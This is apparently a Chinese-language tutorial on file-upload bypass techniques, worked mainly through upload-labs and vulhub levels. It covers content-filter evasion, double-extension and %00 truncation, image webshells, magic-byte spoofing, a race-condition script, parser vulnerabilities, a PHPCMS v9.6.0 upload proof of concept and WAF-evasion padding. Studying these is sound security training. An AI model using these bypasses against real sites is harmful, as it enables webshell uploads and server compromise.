我们上传文件用burp抓包后面添加上. .

image-20220129175637509

上传成功

image-20220128164952677

image-20220127191609964

内容绕过

检查<?php绕过

上传内容不能有php的字符

可以看见下面有php这字符就不能上传

image-20221205203934050

我们就可以用下面这几个方法

1
2
3
<? echo '123';?>                                             //前提是开启配置参数short_open_tags=on
<?=(表达式)?>                                               //不需要开启参数设置
<% echo '123';%>                                          //前提是开启配置参数asp_tags=on

用这个<?=(表达式)?>

image-20221205212239707

检查<?php、$_POST[]绕过

会检查文件内容是否有$_POST[]

看下面他上传不了

image-20221205213042620

我们可以用$_POST{}来检查绕过

image-20221205213207812

检查<?php、$_POST[]、eval绕过

可以用system

使用反引号运算符的效果与函数 shell_exec()相同

1
2
3
4
5
.user.ini:auto_prepend_file=test.png

test.png:<?=system('tac ../fl*')?>

test.png:<? echo `tac /var/www/html/f*`?>

检查<?php、$_POST[]、eval和system绕过

可以看见什么都检查了

image-20221205215725787

我们可以利用

1
``   这俩符号

image-20221205215907972

检查<?php、$_POST[]、eval、system和.绕过

目标过滤点我们可以用文件包含其他地址比如http://1.1.1.1但是地址也有点我们可以用长地址转换

在这个地址转换:在线ip转int,ip转数字-BeJSON.com

127.0.0.1转换成2130706433

image-20221205222942496

看小迪的视频教程的第32个视频的第1分钟52秒

双写绕过

目标的代码会删除指定的文件名比如php,asp等从而达到现在文件上传的类型,我们就可以用这个双写绕过达到绕过

upload-labs第十一关

看一下源代码

下面的代码他会指定删除文件后缀带有 $deny_ext数组里面的,比如我们上传a.php然后后面带$deny_ext里面的内容他就替换为空,下面用的是str_ireplace()这个函数

str_ireplace()函数替换字符串中的一些字符(不区分大小写)

他只删除一次我们就可以通过,双写绕过来绕过

比如

​ a.php会变成a.

​ a.pphphp会变成a.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess","ini");

        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = str_ireplace($deny_ext,"", $file_name);
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = UPLOAD_PATH.'/'.$file_name;        
        if (move_uploaded_file($temp_file, $img_path)) {
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }

我们上传文件叫phpinfo.php改成phpinfo.pphphp

image-20220130211647629

看一下上传的目标文件

image-20220130211754624

访问文件

image-20220130211856030

00截断

参考https://blog.csdn.net/weixin_44840696/article/details/90581104

参考https://blog.csdn.net/qq_26090065/article/details/81458937

00截断原理

00截断是操作系统层的漏洞,由于操作系统是C语言或汇编语言编写的,这两种语言在定义字符串时,都是以\0(即0x00)作为字符串的结尾

0x00 是 ascii 为 0 的字符。而ascii中0作为特殊字符保留,表示字符串结束

00截断原理,为什么能做到00截断?

%00是url编码后的,实际上是构造ASCII码值的0,0x00是字符串的结束标识符,了解%00实际上我们要先了解0x00,0x00实际上是一个十六进制表示方法,实际上就是表示ASCII码值为0,
0x开头表示16进制,0在十六进制中是00, 0x00就是%00解码成的16进制

在url中%00表示ascll码中的0 ,而ascii中0作为特殊字符保留,表示字符串结束,所以当url中出现%00时就会认为读取已结束

00截断要求

  • php版本要小于5.3.4,5.3.4及以上已经修复该问题
  • magic_quotes_gpc需要为OFF状态

GET请求

upload-labs第十二关

看一下源代码

第八行有一个$_GET[‘save_path’]获取我们的参数,后面”/“.rand(10, 99).date(“YmdHis”).”.”.$file_ext;,就是我们添加文件的时间和文件后缀

第十行可以看见,直接用的第八行的路径进行保存

我们就可以用%00截断叫后面的”/“.rand(10, 99).date(“YmdHis”).”.”.$file_ext给去除掉

比如

​ 我们上传的是a.php%00.png======就变成了a.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错!';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

上传一个文件phpinfo.png内容

1
<?php phpinfo(); ?>

修改文件的内容路径后面加上a.php%00

image-20220203195642716

结果

image-20220127191609964

POST请求

upload-labs第十三关

%00在get请求里面会自动解码

在post里面应为我的burp url的解码有毛病我们就可以用修改十六进制

看一下代码和第十二关一样就是一个是get请求一个是post请求

第八行有一个$_POST[‘save_path’]获取我们的参数,后面”/“.rand(10, 99).date(“YmdHis”).”.”.$file_ext;,就是我们添加文件的时间和文件后缀

第十行可以看见,直接用的第八行的路径进行保存

我们就可以用%00截断叫后面的”/“.rand(10, 99).date(“YmdHis”).”.”.$file_ext给去除掉

比如

​ 我们上传的是a.php%00.png======就变成了a.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件!";
    }
}

上传一个文件phpinfo.png内容

1
<?php phpinfo(); ?>

修改文件的内容路径后面加上a.php=,我加这个=是为了在修改十六进制好找

image-20220203200700258

image-20220203200757283

image-20220203200820186

结果

image-20220127191609964

图片马

将照片和webshell合成绕过

他会吧一个webshell的木马复制到照片里面,但是这个有一个问题就是当服务器解析照片的时候可能会受到照片的源码的内容应为webshell的运行

copy命令

我们准备一个文件名叫phpinfo.php

内容

1
<?php echo phpinfo();?>

还有一个普通的照片名字zm9kpy.jpg

image-20201227100118849

命令copy /a zm9kpy.jpg + /b phpinfo.php = a.jpg

  • /a 表示以ASCII方式打

  • /b 表示以二进制方式打开

照片顺序不要搞错了不然就叫webshell代码插到最前面了

可以看见生成出来一个a.jpg文件

编辑出来的照片有的可能查看不了

image-20201227110046213

教程上是这样写的不容易看懂

image-20201227100734663

照片还是可以打开的

image-20201227110144969

查看照片文件的源代码

可以看见已经插入上面了

image-20201227110517915

文件幻术头绕过

同照片的文件内容前几个自己都是相同的下面的16进制是在一个博客上https://blog.csdn.net/Kevinhanser/article/details/81613003找的

1
2
3
jpg=FF D8 FF E0 00 10 4A 46 49 46
gif=47 49 46 38 39 61
png = 89 50 4E 47

我用burp抓一个jpg的数据包看一下16进行的头

可以看见是相通的

image-20201227114401188

修改数据包的内容绕过

有的过滤会检查文件内容每一个照片里面都有一个前面这个字段来代表文件类型
我们抓一个普通的照片上传文件的数据包

可以看见前面有一个PNG的字符串

image-20201226193145015

upload-labs第十四关和第十五关

他俩都可以用下面这个方法绕过

上发一个phpinfo.php文件里面内容

1
2
3
<?php
echo phpinfo();
?>

上发的时候用burp抓包如果叫文件名,和类型给修改成png格式的发现还是发不上去

image-20201226193531143

然后我们发一个png文件叫里面的文件给文件内容全部给改成webshell只留下照片的内容头的部分

上传一个普通照片文件

image-20201227084637858

用burp进行抓包

image-20201227084716612

然后我们叫里面改成webshell只留下照片的内容头的部分

image-20201227084821816

放包就上发上去了

image-20201227095004893

但是是执行不了的应为他是png文件,可以通过其他的漏洞进行执行比如解析漏洞

二次渲染

什么是二次渲染就是我们上传一个头像然后目标网站会同意叫照片变多大修改照片的大小里面的文件内容也会修改,还有就是可以设置图像的大小也是二次渲染

upload-labs第十四关

我们用burp一直发包

image-20220419094513946

脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
import  threading
import requests

headers = {  # 定义User-Agent请求头,用键值对的方式
            "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",

        }
global Record


# 竞争返回的结果
def Searchresults(html):
    Searchresults_document = open("url.html", 'a')  # 打开文件写的方式
    Searchresults_document.write(html)  # 写入
    Searchresults_document.close()  # 关闭文件

def thread(url,headers):
    while 1:
        try:
            html=requests.get(url,headers=headers)


            if html.status_code==200: # 如果目标返回200说明竞争成功
                print("\033[0;33;40m竞争成功:\033[0m"+url)
                Searchresults(html.text)
                break

            else:
                print("\033[0;31;40m竞争失败:\033[0m"+url)
        except Exception as bc:
            print("出差了:" + str(bc))
if __name__=='__main__':

    print("""
    -------------------------------
    -    竞争的结果会保存成url.html  -
    -               ***** 简单脚本 -
    -------------------------------
    """)
    url=input("请输入竞争url:")
    speed=int(input("请输入多少线程:"))

    t_list = []
    for i in range(speed):
        t = threading.Thread(target=thread,args=(url,headers))
        t_list.append(t)
        t.start()
    for t in t_list:
        t.join()

image-20220419094752296

image-20220419094847435

目录命名/.绕过

以文件夹名的突破方式绕过后缀的限制同时在最终代码执行结果会保存为php文件

1
xxxxx.php/.

upload-labs第二十关

看一下代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传出错!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

第8行有一个pathinfo函数

pathinfo()函数获得一个文件的路径、名称,或者是扩展名等

返回的数组元素如下:

  • dirname: 目录路径

  • basename: 文件名

  • extension: 文件后缀名

  • filename: 不包含后缀的文件名

语法:pathinfo(path,options)

参数 描述
path 必需。规定要检查的路径。
options 可选。规定要返回的数组元素。默认是 all。
可能的值:
PATHINFO_DIRNAME :只返回 dirname(目录路径)
PATHINFO_BASENAME :只返回 basename(文件名)
PATHINFO_EXTENSION :只返回 extension(文件后缀名)
PATHINFO_FILENAME : 只返回 filename(不包含后缀的文件名)

演示无第二个参数

1
2
3
4
5
<?php
    $file_name = "/testweb/test.txt";
    $file_ext = pathinfo($file_name);
    print_r($file_ext);
?>

结果

1
2
3
4
5
6
7
Array
(
    [dirname] => /testweb
    [basename] => test.txt
    [extension] => txt
    [filename] => test
)

演示有第二个参数

1
2
3
4
5
<?php
        $file_name = "/testweb/test.txt";
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);
		print_r($file_ext);
?>

结果

1
txt

比我们上传的是xxxxx.php/.

到目标就变成了xxxxx.php

解析漏洞

IIS6.0解析漏洞

环境win2003 iis6.0

IIS 6.0解析利用方法有两种

  • 目录解析
  • 文件解析

目录解析

假如你有一个*.asp的目录IIS6.0解析漏洞会吧*.asp的目录里面的文件全部当做asp来解析

演示

我在网站的目录创建一个a.asp的目录里面有一个abc.png的文件

abc.png的文件内容

1
<%response.write("Hello World!")%>

image-20220210130104792

结果

image-20220210130303009

文件解析

a.asp;.png在服务器那边;后面的内容就会被截断

演示

在网站跟目录创建一个a.asp;.png文件

image-20220210130710603

访问

image-20220210130758338

apache解析漏洞

低版本apache解析漏洞

这个原理就是apache在解析从右到左查看文件名,如果不认识,继续向左识别,知道认识这个文件类型

比如 abc.php.aaaa.qqqq

apache在解析不认识.qqqq,在向前解析.aaaa不认识在向前解析,.php这个认识,最终解析成php

演示上传一个a.php.qqq文件

image-20220211113424498

Apache HTTPD 换行解析漏洞分析与复现

漏洞编号CVE-2017-15715

Apache在2.4.0-2.4.29版本中存在一个解析漏洞。程序在解析PHP时,如果文件名最后有一个换行符x0A,apache依然会将其当成php解析,但是在上传文件时可以成功的绕过黑名单

演示靶场环境vulhub进入/httpd/CVE-2017-15715

image-20220211175547704

image-20220211175715312

image-20220211175727354

image-20220211175757884

Nginx解析漏洞

低版本解析漏洞

这个我不知道是漏洞到那个版本

原因在于,Nginx拿到文件路径(更专业的说法是URI)/test.jpg/test.php 后,一看后缀是.php,便认为该文件是php文件,于是转交给php去处理。php一看 /test.jpg/test.php 不存在,便删去最后的/test.php,又看/test.jpg存在,便把/test.jpg当成要执行的文件了,又因为后缀为.jpg,php认为这不是php文件,

image-20220213132746444

Nginx 文件名逻辑漏洞(CVE-2013-4547)

其影响版本为: Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7,范围较广

漏洞复现文章地址https://vulhub.org/#/environments/nginx/CVE-2013-4547/

进入/vulhub/nginx/CVE-2013-4547,启动靶场环境:docker-compose up -d

[0x20]是空格,[0x00]是\0,这两个字符都不需要编码

1
uploadfiles/1.gif[0x20][0x00].php

image-20220513200053600

然后查看16进制进行修改

漏洞复现

PHPCMSv9.6.0任意文件上传漏洞

我们先在其他服务器上创建一个要上传的文件

image-20220419100922209

搭建好后点击会员注册

image-20220419100750506

抓包

poc

1
siteid=1&modelid=11&username=test2&password=test2123&email=test2@163.com&info[content]=<img src=http://192.168.0.106/phpinfo.txt?.php#.jpg>&dosubmit=1&protocol=

src里面是其他服务器上创建一个要上传的文件地址

image-20220419101425633

访问地址

image-20220419101530089

waf绕过

这个文章应该比我写的详细https://www.yuque.com/samxara/swro13/ee9r0h

上传参数名解析:明确哪些东西能修改?

1
2
3
4
5
6
7
8
9
10
-----------------------------79375596321075324404143374640
Content-Disposition: form-data; name="upload_file"; filename="phpinfo.jpg"
Content-Type: image/jpeg
上面是真实数据


Content-Disposition:	一般可更改
name:	表单参数值,不能更改
filename :文件名,可以更改
Content-Type:文件MIME,视情况更改

垃圾字符填充绕过

成功了

Content-Disposition与name之间的垃圾数据加上分号可绕过安全狗

name与filename之间的垃圾数据也可绕过

垃圾字符填充的原理就是填充的字符长度超过了WAF检测的字符长度,所以能够成功绕过,安全狗的默认检测URL长度为2048字节

环境upload-labs和安全狗

upload-labs的第二关我们修改文件类型就可以绕过,我们添加上安全狗上传就不拦截,我们就可以用超级多多字符绕过这个限制

下面源请求修改了文件类型,有安全狗被拦截了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /upload-labs/Pass-02/index.php HTTP/1.1
Host: 192.168.0.107
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4024755048984814162338962553
Content-Length: 361
Origin: http://192.168.0.107
Connection: close
Referer: http://192.168.0.107/upload-labs/Pass-02/index.php
Upgrade-Insecure-Requests: 1

-----------------------------4024755048984814162338962553
Content-Disposition: form-data; name="upload_file"; filename="phpinfo.php"
Content-Type: image/png

<?php phpinfo(); ?> 
-----------------------------4024755048984814162338962553
Content-Disposition: form-data; name="submit"

上传
-----------------------------4024755048984814162338962553--

我们把

代码下面应为太长我就删除了中间的

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
POST /upload-labs/Pass-02/index.php HTTP/1.1
Host: 192.168.0.107
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------3440298842996763469523404607
Content-Length: 40543
Origin: http://192.168.0.107
Connection: close
Referer: http://192.168.0.107/upload-labs/Pass-06/index.php
Upgrade-Insecure-Requests: 1

-----------------------------3440298842996763469523404607
Content-Disposition: form-data;dsadasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdadasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasddasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasddasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasddasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasddasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasdasd